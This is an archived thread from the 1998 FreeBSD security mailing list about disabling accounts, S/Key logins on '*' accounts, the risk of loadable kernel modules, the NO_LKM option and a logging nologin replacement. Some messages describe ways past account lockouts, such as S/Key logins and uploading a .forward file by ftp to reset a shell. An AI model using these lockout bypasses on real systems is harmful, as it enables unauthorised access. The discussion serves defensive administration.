Mutt 0.88e In-Reply-To: <199805212338.QAA05467@antipodes.cdrom.com>; from Mike Smith on Thu, May 21, 1998 at 04:38:30PM -0700 X-Operating-System: FreeBSD 2.2.5-STABLE i386 Organization: PROSA Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk Mike Smith writes: > > I'm currently experimenting with 2.2.6, FWTK and skey. > > > > 1) First thing I noticed is that it's possible for someone to log > > into the system, even if the account is disabled ('*' in the > > passwd field), when S/Key is enabled for that user. > > > > Surprise to me. > > "*" does not disable an account - it is an invalid crypted string which > will fail to match any crypted plaintext password, as used by login, > the r* commands and ftp (when FTP is not using s/key). Ok -- just referrring to the man page: The password field is the encrypted form of the password. If the password field is empty, no password will be required to gain access to the machine. This is almost invariably a mistake. Because these files contain the encrypted user passwords, they should not be readable by any- one without appropriate privileges. Administrative accounts have a pass- word field containing an asterisk `*' which disallows normal logins. ... it doesn't mention the fact that they _also_ have an invalid shell. -- -[ Philippe Regnauld / sysadmin / regnauld@deepo.prosa.dk / +55.4N +11.3E ]- «Pluto placed his bad dog at the entrance of Hades to keep the dead IN and the living OUT! The archetypical corporate firewall?» - S. Kelly Bootle To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Fri May 22 01:24:31 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id BAA06480 for freebsd-security-outgoing; Fri, 22 May 1998 01:24:31 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from firewall.ftf.dk (root@mail.ftf.dk [129.142.64.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id BAA06470 for ; Fri, 22 May 1998 01:24:24 -0700 (PDT) (envelope-from regnauld@deepo.prosa.dk) Received: from mail.prosa.dk ([192.168.100.2]) by firewall.ftf.dk (8.7.6/8.7.3) with ESMTP id MAA17560; Fri, 22 May 1998 12:25:02 +0200 Received: from deepo.prosa.dk (deepo.prosa.dk [192.168.100.10]) by mail.prosa.dk (8.8.5/8.8.5/prosa-1.1) with ESMTP id KAA22076; Fri, 22 May 1998 10:49:12 +0200 (CEST) Received: (from regnauld@localhost) by deepo.prosa.dk (8.8.7/8.8.5/prosa-1.1) id KAA17475; Fri, 22 May 1998 10:23:23 +0200 (CEST) Message-ID: <19980522102323.48197@deepo.prosa.dk> Date: Fri, 22 May 1998 10:23:23 +0200 From: Philippe Regnauld To: Nicholas Charles Brawn Cc: freebsd-security@FreeBSD.ORG Subject: Re: Virus on FreeBSD References: <199805211431.KAA17444@brain.zeus.leitch.com> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit X-Mailer: Mutt 0.88e In-Reply-To: ; from Nicholas Charles Brawn on Fri, May 22, 1998 at 10:02:46AM +1000 X-Operating-System: FreeBSD 2.2.5-STABLE i386 Organization: PROSA Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk Nicholas Charles Brawn writes: > > > > I'd love to have a "virus" scanner that could detect the signature of a > > LKM module or the LKM loader in a kernel. Of course by "signature" here > > I mean something that would recognize the style of code necessary to > > perform this operation, not the specific sequence of bits in any given > > implementation. > > You may have a point here. Is there any way you could "sign" a module to > ensure it's authenticity? And on top of that build in an automatic > authentication system within the kernel that rejects lkm's that are not > signed? Perhaps this could be included so as to be performed at one of the > securelevels? Hey, great idea, let's call it Active-LKM. :-) -- -[ Philippe Regnauld / sysadmin / regnauld@deepo.prosa.dk / +55.4N +11.3E ]- «Pluto placed his bad dog at the entrance of Hades to keep the dead IN and the living OUT! The archetypical corporate firewall?» - S. Kelly Bootle To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Fri May 22 02:02:16 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id CAA11026 for freebsd-security-outgoing; Fri, 22 May 1998 02:02:16 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from arc.netlab.sk (arc.netlab.sk [195.168.1.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id CAA10930 for ; Fri, 22 May 1998 02:02:05 -0700 (PDT) (envelope-from palo.adamec@tecton.sk) Received: from PCNTWS1 (ba78.netlab.sk [195.168.14.78]) by arc.netlab.sk (8.8.8/8.8.7) with SMTP id LAA25088 for ; Fri, 22 May 1998 11:02:01 +0200 (CEST) (envelope-from palo.adamec@tecton.sk) Received: by PCNTWS1 with Microsoft Mail id <01BD8571.D24221F0@PCNTWS1>; Fri, 22 May 1998 11:07:34 +0200 Message-ID: <01BD8571.D24221F0@PCNTWS1> From: Pavol Adamec To: "freebsd-security@FreeBSD.ORG" Subject: Re: Virus on FreeBSD Date: Fri, 22 May 1998 11:07:33 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by hub.freebsd.org id CAA10973 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk Nicholas Charles Brawn wrote: >You may have a point here. Is there any way you could "sign" a module to >ensure it's authenticity? And on top of that build in an automatic >authentication system within the kernel that rejects lkm's that are not >signed? Perhaps this could be included so as to be performed at one of the >securelevels? There's something little close to what you mean. There are some research OS projects dealing with extensible (micro/nano)kernels. Many of them use some kind of LKM's, varying from SPIN with in-kernel MODULA compiler to systems based on run-time proving of the correctness of the code being loaded. I'm very sorry, that I don't remember the the name, but there is one, that does in-kernel run-time checking of the object code based on the formal description of the instructions. I've read it in an ACM's SIGOPS OSR issue somewhere in 1997 or 1996. I don't have them by the hand at the present, so that's way my answer is so uncertain. Maybe there's someone who could look for it. For those who don't know OSR, have a look at http://www.acm.org/sigops/ ------------------------------------------------------------------- Pavol Adamec AZC, a.s. Kukucinova 22, Bratislava, Slovakia tel: ++421 7 5252688 fax: ++421 7 5252679 email: palo.adamec@tecton.sk ------------------------------------------------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Fri May 22 03:07:05 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id DAA21516 for freebsd-security-outgoing; Fri, 22 May 1998 03:07:05 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from portal.eltex.spb.ru ([195.19.195.34]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id DAA21488 for ; Fri, 22 May 1998 03:06:51 -0700 (PDT) (envelope-from ark@eltex.spb.ru) From: ark@eltex.spb.ru Received: from paranoid.eltex.spb.ru (border1.eltex.spb.ru [194.58.218.11] (may be forged)) by portal.eltex.spb.ru (8.8.8/8.8.8) with ESMTP id OAA02725; Fri, 22 May 1998 14:01:12 +0400 (MSD) Received: (from ark@localhost) by paranoid.eltex.spb.ru (8.8.8/8.7.3) id OAA16417; Fri, 22 May 1998 14:02:08 GMT Date: Fri, 22 May 1998 14:02:08 GMT Message-Id: <199805221402.OAA16417@paranoid.eltex.spb.ru> In-Reply-To: <199805211901.PAA23176@brain.zeus.leitch.com> from "woods@zeus.leitch.com (Greg A. Woods)" Organization: "Klingon Imperial Intelligence Service" Subject: Re: Virus on FreeBSD To: freebsd-security@FreeBSD.ORG Cc: regnauld@deepo.prosa.dk Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk -----BEGIN PGP SIGNED MESSAGE----- nuqneH, woods@zeus.leitch.com (Greg A. Woods) said : > [ On Thu, May 21, 1998 at 18:15:55 (+0200), Philippe Regnauld wrote: ] > > Subject: Re: Virus on FreeBSD > > > > Greg A. Woods writes: > > > > > Anyone who's read that article and has even the tiniest amount of > > > imagination would *NEVER* run LKMs on a production machine. Sure > > > > BTW, is there a mechanism to disable loading of LKMs ? > > (of course, removing the modload command is one way) -- I was > > thinking about something that looked at the securelevel > > and refused to load/unload a module depending on it. > > Not difficult at all, thankfully. Just define NO_LKM in your kernel > configuration (from the /sys/i386/conf/LINT kernel config example): > > # If you want to disable loadable kernel modules (LKM), you > # might want to use this option. > options NO_LKM > > I've not done a code walkthrough to ensure this is 100%, but it's a good > start and at least prevents modload from being useful. 2.1.7.1 does not have NO_LKM option in LINT. Don't know if it does something for that system. _ _ _ _ _ _ _ {::} {::} {::} CU in Hell _| o |_ | | _|| | / _||_| |_ |_ |_ (##) (##) (##) /Arkan#iD |_ o _||_| _||_| / _| | o |_||_||_| [||] [||] [||] Do i believe in Bible? Hell,man,i've seen one! -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv iQCVAwUBNWWFX6H/mIJW9LeBAQHp/AQAicOQcxk6CZAO3VSxnLHKAIYSsyRgj+2i /1U6AEmn1wI+VdbEk9o/1xxMAMFsV89UWwf3qhZi+qbSWdUvY7kxY7WNJe/mEi3Y uQqfkEwbSQgTTUZc1SUbxdqV+Za/7MS8Y4oxct3640oCBbsSuAjcQG44p7ZxpBqE aYfqvFlu5gg= =mPGa -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Fri May 22 05:36:16 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id FAA12086 for freebsd-security-outgoing; Fri, 22 May 1998 05:36:16 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from fledge.watson.org (root@COPLAND.CODA.CS.CMU.EDU [128.2.222.48]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id FAA12054 for ; Fri, 22 May 1998 05:36:07 -0700 (PDT) (envelope-from robert@cyrus.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.8.8/8.8.8) with SMTP id IAA11238; Fri, 22 May 1998 08:35:59 -0400 (EDT) Date: Fri, 22 May 1998 08:35:59 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org Reply-To: Robert Watson To: Pavol Adamec cc: "freebsd-security@FreeBSD.ORG" Subject: Re: Virus on FreeBSD In-Reply-To: <01BD8571.D24221F0@PCNTWS1> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk On Fri, 22 May 1998, Pavol Adamec wrote: > There's something little close to what you mean. There are some research > OS projects dealing with extensible (micro/nano)kernels. Many of them > use some kind of LKM's, varying from SPIN with in-kernel MODULA compiler > to systems based on run-time proving of the correctness of the code > being loaded. I'm very sorry, that I don't remember the the name, but > there is one, that does in-kernel run-time checking of the object code > based on the formal description of the instructions. I've read it in an > ACM's SIGOPS OSR issue somewhere in 1997 or 1996. I don't have them by > the hand at the present, so that's way my answer is so uncertain. Maybe > there's someone who could look for it. There is work going on at the Fox project at CMU (sorry, URL not available just this moment due to DNS problems) with a proof-generating compiler that guarantees memory/type safety -- I believe that the first intended use was providing a replacement for BPF. The compiler generates machine code + a proof of its safety. The kernel then does a linear-order verification of the proof, and can safely use the machine code. Leaving aside issues of Turing computability and undecidability, this is extremely useful :). I know that they are working on bigger and better things there, and that operating systems with built in proof verification might see dramatic performance increases, as the kernel could effectively host a thread for them that "promises" (by way of a verifiable proof) that it will behave correctly (i.e., not touch other people's memory, etc). I believe they do this by a combination of proven pre/post-conditions, and where a proof is not available, run-time checks that are proven to be safe. I believe one could see a dramatic performance improvement in a number of places if memory safety was guaranteed -- even just as simple as guaranteeing that syscall arguements were correcty and did not need to be verified against memory allocation, etc. There are limits to what the proof system can currently do, but it looks remarkably promising (I had given up on proofs for a while there.. :). With regards to other signatures -- I suppose we could have a digital signature on an lkm -- but this isn't all that useful. Suppose a bug is discovered in an lkm in version 2.2.9. In 2.2.9.1, a fix is released. Both are signed by the FreeBSD Project Magic Key. However, unless you do some weird things with versions, the kernel will accept both of the lkms, including the buggy one. To protect the kernel properly, lkms need to be disabled at a sufficiently high run-level (possibly always), and appropriate file system stuff protected. Personally, I like the idea of using a CD-ROM for a file system, but it's not so very fast. Robert N Watson ---- Carnegie Mellon University http://www.cmu.edu/ Trusted Information Systems http://www.tis.com/ SafePort Network Services http://www.safeport.com/ robert@fledge.watson.org http://www.watson.org/~robert/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Fri May 22 06:25:35 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id GAA18305 for freebsd-security-outgoing; Fri, 22 May 1998 06:25:35 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from softweyr.com ([204.68.178.33]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id GAA18296 for ; Fri, 22 May 1998 06:25:24 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from softweyr.com (localhost.softweyr.com [127.0.0.1]) by softweyr.com (8.8.8/8.8.7) with ESMTP id HAA02079; Fri, 22 May 1998 07:24:56 -0600 (MDT) (envelope-from wes@softweyr.com) Message-ID: <35657CA6.D93AC10D@softweyr.com> Date: Fri, 22 May 1998 07:24:54 -0600 From: Wes Peters Organization: Softweyr llc X-Mailer: Mozilla 4.04 [en] (X11; I; FreeBSD 2.2.6-RELEASE i386) MIME-Version: 1.0 To: Philippe Regnauld CC: Mike Smith , freebsd-security@FreeBSD.ORG Subject: Re: SKey and locked account References: <19980521183148.07894@deepo.prosa.dk> <199805212338.QAA05467@antipodes.cdrom.com> <19980522101215.41390@deepo.prosa.dk> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk Philippe Regnauld wrote: > Ok -- just referrring to the man page: > > The password field is the encrypted form of the password. If the > password field is empty, no password will be required to gain access to > the machine. This is almost invariably a mistake. Because these files > contain the encrypted user passwords, they should not be readable by any- > one without appropriate privileges. Administrative accounts have a pass- > word field containing an asterisk `*' which disallows normal logins. > > ... it doesn't mention the fact that they _also_ have an invalid > shell. Yeah, this little bit of UNIX arcana has been batted back and forth for years. At least FreeBSD *has* a nologin program, see nologin(8). I don't like it, because it doesn't log the failed access. Here's my replacement, which does: ~~~~~~~~~ nologin.c ~~~~~~~~~ /* * nologin.c - a login shell for disabling users. * * Copyright (c) 1997 Softweyr LLC, South Jordan, Utah USA. * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * * This product includes software developed by Softweyr LLC * * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * This software is provided by Softweyr LLC ``as is'' and any express or * implied warranties, including, but not limited to, the implied warranties * of merchantability and fitness for a particular purpose are disclaimed. * In no event shall Softweyr LLC or any contributors be liable for any * direct, indirect, incidental, special, exemplary, or consequential * damages (including, but not limited to, procurement of substitute goods * or services; loss of use, data, or profits; or business interruption) * however caused and on any theory of liability, whether in contract, * strict liability, or tort (including negligence or otherwise) arising in * any way out of the use of this software, even if advised of the * possibility of such damage. * * Author: Wes Peters * Date: Tue Jan 28 21:30:06 MST 1997 */ #include #include #include int main(int argc, char *argv[]) { char *user, *device; if ((user = getlogin()) == NULL) user = "UNKNOWN"; if ((device = ttyname(0)) == NULL) device = "UNKNOWN"; openlog("nologin", LOG_CONS, LOG_AUTH); syslog(LOG_CRIT, "%s on %s", user, device); closelog(); return 0; } ~~~~~~~~~~ nologin.8 ~~~~~~~~~~ .\" nologin.c - a login shell for disabling users. .\" .\" Copyright (c) 1997 Softweyr LLC, South Jordan, Utah USA. .\" All rights reserved. .\" .\" Redistribution and use in source and binary forms, with or without .\" modification, are permitted provided that the following conditions .\" are met: .\" .\" 1. Redistributions of source code must retain the above copyright .\" notice, this list of conditions and the following disclaimer. .\" .\" 2. Redistributions in binary form must reproduce the above copyright .\" notice, this list of conditions and the following disclaimer in the .\" documentation and/or other materials provided with the distribution. .\" .\" 3. All advertising materials mentioning features or use of this software .\" must display the following acknowledgement: .\" .\" This product includes software developed by Softweyr LLC .\" .\" 4. Neither the name of the University nor the names of its contributors .\" may be used to endorse or promote products derived from this software .\" without specific prior written permission. .\" .\" This software is provided by Softweyr LLC ``as is'' and any express or .\" implied warranties, including, but not limited to, the implied warranties .\" of merchantability and fitness for a particular purpose are disclaimed. .\" In no event shall Softweyr LLC or any contributors be liable for any .\" direct, indirect, incidental, special, exemplary, or consequential .\" damages (including, but not limited to, procurement of substitute goods .\" or services; loss of use, data, or profits; or business interruption) .\" however caused and on any theory of liability, whether in contract, .\" strict liability, or tort (including negligence or otherwise) arising in .\" any way out of the use of this software, even if advised of the .\" possibility of such damage. .\" .\" Author: Wes Peters .\" Date: Tue Jan 28 21:30:06 MST 1997 .TH nologin 1 "1 Jan 1997" .SH NAME nologin \- a login shell for disabled users .SH SYNOPSIS .B nologin .SH DESCRIPTION .B nologin is a login shell for user accounts that have been disabled. It logs the attempted login via the .BR syslog (3) mechanism, with an .I ident of .B nologin and a .I facility of .BR LOG_AUTH . Log entries will appear in the system log as: .LP .RS Jan 28 21:36:54 .I hostname nologin: .I user on .I /dev/ttypX .RE .LP Please note that you should .B not add the .B nologin program to the .B /etc/shells file, as you do not want users to accidentally set their shell to .B nologin. .SH AUTHOR Wes Peters, Softweyr LLC: wes@softweyr.com ~~~~~~~~~~ end snip ~~~~~~~~~~ -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC http://www.softweyr.com/~softweyr wes@softweyr.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Fri May 22 07:07:38 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id HAA26197 for freebsd-security-outgoing; Fri, 22 May 1998 07:07:38 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from firewall.ftf.dk (root@mail.ftf.dk [129.142.64.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id HAA26163 for ; Fri, 22 May 1998 07:07:33 -0700 (PDT) (envelope-from regnauld@deepo.prosa.dk) Received: from mail.prosa.dk ([192.168.100.2]) by firewall.ftf.dk (8.7.6/8.7.3) with ESMTP id SAA20028; Fri, 22 May 1998 18:08:00 +0200 Received: from deepo.prosa.dk (deepo.prosa.dk [192.168.100.10]) by mail.prosa.dk (8.8.5/8.8.5/prosa-1.1) with ESMTP id QAA22445; Fri, 22 May 1998 16:32:10 +0200 (CEST) Received: (from regnauld@localhost) by deepo.prosa.dk (8.8.7/8.8.5/prosa-1.1) id QAA22121; Fri, 22 May 1998 16:06:19 +0200 (CEST) Message-ID: <19980522160618.52012@deepo.prosa.dk> Date: Fri, 22 May 1998 16:06:19 +0200 From: Philippe Regnauld To: Robert Watson Cc: "freebsd-security@FreeBSD.ORG" Subject: Re: Virus on FreeBSD References: <01BD8571.D24221F0@PCNTWS1> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit X-Mailer: Mutt 0.88e In-Reply-To: ; from Robert Watson on Fri, May 22, 1998 at 08:35:59AM -0400 X-Operating-System: FreeBSD 2.2.5-STABLE i386 Organization: PROSA Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk Robert Watson writes: > To protect the kernel properly, lkms need to be disabled at a sufficiently > high run-level (possibly always), and appropriate file system stuff > protected. Personally, I like the idea of using a CD-ROM for a file > system, but it's not so very fast. 32x will deliver pretty good performance -- not unlike a washing machine on spin-cycle, but ok. I'm more concerned about how long such a device would live with filesystem-like activity -- the way CD drives are built today, I wouldn't expect very long. -- -[ Philippe Regnauld / sysadmin / regnauld@deepo.prosa.dk / +55.4N +11.3E ]- «Pluto placed his bad dog at the entrance of Hades to keep the dead IN and the living OUT! The archetypical corporate firewall?» - S. Kelly Bootle To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Fri May 22 08:27:43 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id IAA08011 for freebsd-security-outgoing; Fri, 22 May 1998 08:27:43 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from echonyc.com (echonyc.com [198.67.15.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id IAA07984 for ; Fri, 22 May 1998 08:27:32 -0700 (PDT) (envelope-from benedict@echonyc.com) Received: from localhost (benedict@localhost) by echonyc.com (8.8.7/8.8.7) with SMTP id LAA25215; Fri, 22 May 1998 11:27:09 -0400 (EDT) Date: Fri, 22 May 1998 11:27:09 -0400 (EDT) From: Snob Art Genre Reply-To: ben@rosengart.com To: Mike Smith cc: Philippe Regnauld , freebsd-security@FreeBSD.ORG Subject: Re: SKey and locked account In-Reply-To: <199805212338.QAA05467@antipodes.cdrom.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk On Thu, 21 May 1998, Mike Smith wrote: > If you wish to disable a user's account, you should set their shell to > something nonexistent. (Note that ssh may still be a way past this.) How? I don't like this: isn't it standard practice across unixes to set a nonexistent shell to disable logins? POLA etc. Ben "You have your mind on computers, it seems." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Fri May 22 09:36:23 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA19707 for freebsd-security-outgoing; Fri, 22 May 1998 09:36:23 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from sasami.jurai.net (winter@sasami.jurai.net [207.153.65.3]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id JAA19621 for ; Fri, 22 May 1998 09:36:08 -0700 (PDT) (envelope-from winter@jurai.net) Received: from localhost (winter@localhost) by sasami.jurai.net (8.8.8/8.8.7) with SMTP id MAA02617; Fri, 22 May 1998 12:35:16 -0400 (EDT) Date: Fri, 22 May 1998 12:35:15 -0400 (EDT) From: "Matthew N. Dodd" To: ben@rosengart.com cc: Mike Smith , Philippe Regnauld , freebsd-security@FreeBSD.ORG Subject: Re: SKey and locked account In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk On Fri, 22 May 1998, Snob Art Genre wrote: > How? I don't like this: isn't it standard practice across unixes to set > a nonexistent shell to disable logins? POLA etc. I remember getting around this by ftp'ing a .forward file containing nice things to reset my shell. Of course, this assumes that ftp is setup as to allow logins for users with 'invalid' shells. /* Matthew N. Dodd | A memory retaining a love you had for life winter@jurai.net | As cruel as it seems nothing ever seems to http://www.jurai.net/~winter | go right - FLA M 3.1:53 */ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Fri May 22 12:47:50 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id MAA02268 for freebsd-security-outgoing; Fri, 22 May 1998 12:47:50 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from alpha.sea-to-sky.net (sreid@sea-to-sky.net [204.244.200.240]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id MAA02184 for ; Fri, 22 May 1998 12:47:35 -0700 (PDT) (envelope-from sreid@alpha.sea-to-sky.net) Received: (from sreid@localhost) by alpha.sea-to-sky.net (8.8.7/8.8.7) id MAA21169; Fri, 22 May 1998 12:51:43 -0700 Date: Fri, 22 May 1998 12:51:43 -0700 (PDT) From: Steve Reid To: ark@eltex.spb.ru cc: freebsd-security@FreeBSD.ORG, regnauld@deepo.prosa.dk Subject: options NO_LKM (was Re: Virus on FreeBSD) In-Reply-To: <199805221402.OAA16417@paranoid.eltex.spb.ru> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk On Fri, 22 May 1998 ark@eltex.spb.ru wrote: > 2.1.7.1 does not have NO_LKM option in LINT. Don't know if it does > something for that system. I grepped my entire 2.2.5-RELEASE kernel source for the string 'NO_LKM' and couldn't find it. When was this option added to the kernel? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Fri May 22 13:42:19 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id NAA12748 for freebsd-security-outgoing; Fri, 22 May 1998 13:42:19 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from burka.rdy.com (dima@burka.rdy.com [205.149.163.30]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id NAA12601 for ; Fri, 22 May 1998 13:42:01 -0700 (PDT) (envelope-from dima@burka.rdy.com) Received: (from dima@localhost) by burka.rdy.com (8.8.8/RDY&DVV) id NAA08934; Fri, 22 May 1998 13:41:37 -0700 (PDT) Message-Id: <199805222041.NAA08934@burka.rdy.com> Subject: Re: options NO_LKM (was Re: Virus on FreeBSD) In-Reply-To: from Steve Reid at "May 22, 98 12:51:43 pm" To: sreid@alpha.sea-to-sky.net (Steve Reid) Date: Fri, 22 May 1998 13:41:37 -0700 (PDT) Cc: ark@eltex.spb.ru, freebsd-security@FreeBSD.ORG, regnauld@deepo.prosa.dk X-Class: Fast Organization: HackerDome Reply-To: dima@best.net From: dima@best.net (Dima Ruban) X-Mailer: ELM [version 2.4ME+ PL40 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk Steve Reid writes: > On Fri, 22 May 1998 ark@eltex.spb.ru wrote: > > 2.1.7.1 does not have NO_LKM option in LINT. Don't know if it does > > something for that system. > > I grepped my entire 2.2.5-RELEASE kernel source for the string 'NO_LKM' > and couldn't find it. When was this option added to the kernel? dima 1998/02/11 12:48:05 PST Modified files: sys/i386/conf LINT sys/kern kern_lkm.c Log: I'm not sure whether this is a correct way to do it, but here's a new kernel option - "NO_LKM" If anyone has better ideas - please let me know. Revision Changes Path 1.406 +5 -1 src/sys/i386/conf/LINT 1.47 +3 -3 src/sys/kern/kern_lkm.c > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe security" in the body of the message > -- dima To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Fri May 22 16:29:31 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id QAA13875 for freebsd-security-outgoing; Fri, 22 May 1998 16:29:31 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from annwn.phys.washington.edu (annwn.phys.washington.edu [128.95.93.180]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id QAA13738 for ; Fri, 22 May 1998 16:28:39 -0700 (PDT) (envelope-from somsky@annwn.phys.washington.edu) Received: (from somsky@localhost) by annwn.phys.washington.edu (8.8.8/8.8.8) id QAA00295 for freebsd-security@FreeBSD.ORG; Fri, 22 May 1998 16:28:25 -0700 (PDT) (envelope-from somsky) Date: Fri, 22 May 1998 16:28:25 -0700 (PDT) From: "William R. Somsky" Message-Id: <199805222328.QAA00295@annwn.phys.washington.edu> To: freebsd-security@FreeBSD.ORG Subject: How to let users access removable media? Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk I've just recently set up a couple of FreeBSD systems here at the UW Physics department, and I need to be able to set them up so that the users can access the floppy and (ATAPI) zip drives. For mtools access, I suppose I can just make /dev/[r]fd0 and /dev/[r]wfd0* be world readable and writable, but is this the best way to go about it? Should something else be used? And I doubt that it's immenent, but what about when someone wants to mount a cd-rom? I'd like to be able to handle this in a relatively secure fashion w/out compromising the systems. Anyone been through this before or/have any suggestions? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Fri May 22 18:49:27 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id SAA10481 for freebsd-security-outgoing; Fri, 22 May 1998 18:49:27 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from netmug.org (perl@netmug.org [207.88.43.66]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id SAA10471 for ; Fri, 22 May 1998 18:49:18 -0700 (PDT) (envelope-from perl@netmug.org) Received: from localhost (perl@localhost) by netmug.org (8.8.8/NetMUG_1.0.0) with SMTP id SAA25881; Fri, 22 May 1998 18:47:17 -0700 (PDT) Date: Fri, 22 May 1998 18:47:17 -0700 (PDT) From: perl To: "William R. Somsky" cc: freebsd-security@FreeBSD.ORG Subject: Re: How to let users access removable media? In-Reply-To: <199805222328.QAA00295@annwn.phys.washington.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk fbtab - change device protection upon login Check out the fbtab(5) man page for more info. Michael On Fri, 22 May 1998, William R. Somsky wrote: > I've just recently set up a couple of FreeBSD systems here at > the UW Physics department, and I need to be able to set them > up so that the users can access the floppy and (ATAPI) zip > drives. For mtools access, I suppose I can just make /dev/[r]fd0 > and /dev/[r]wfd0* be world readable and writable, but is this the > best way to go about it? Should something else be used? And I doubt > that it's immenent, but what about when someone wants to mount a cd-rom? > I'd like to be able to handle this in a relatively secure fashion w/out > compromising the systems. Anyone been through this before or/have any > suggestions? > > > To Unsubscribe: send mail to 